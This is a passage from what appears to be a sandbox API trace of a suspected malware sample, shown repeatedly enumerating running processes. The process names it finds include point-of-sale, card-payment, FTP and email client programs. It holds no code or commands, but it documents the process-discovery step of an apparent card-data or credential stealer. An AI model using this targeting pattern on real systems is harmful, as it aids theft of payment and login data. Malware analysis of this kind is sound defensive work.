th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0220.847] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0220.873] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0220.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0220.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0220.877] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0220.879] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0220.880] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0220.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0220.883] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0220.885] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0220.889] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0220.891] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0220.892] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0220.894] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0220.895] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0220.896] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0220.898] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.899] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.901] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.905] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0220.906] CloseHandle (hObject=0x1018) returned 1 [0220.906] Sleep (dwMilliseconds=0x64) [0221.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0221.049] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.050] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.051] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.053] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.054] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.056] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.060] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.061] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.063] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.064] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.066] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.067] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.069] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.071] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.072] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.171] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.187] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.189] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.191] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.192] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.194] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.196] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.198] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.203] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.205] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.207] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.210] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0221.230] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0221.232] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0221.235] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0221.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0221.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0221.240] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0221.242] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0221.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0221.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0221.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0221.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0221.256] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0221.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0221.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0221.265] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0221.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0221.269] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0221.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0221.272] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0221.274] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0221.283] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0221.285] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0221.287] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0221.289] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0221.291] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0221.297] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0221.300] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0221.302] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0221.304] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0221.307] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 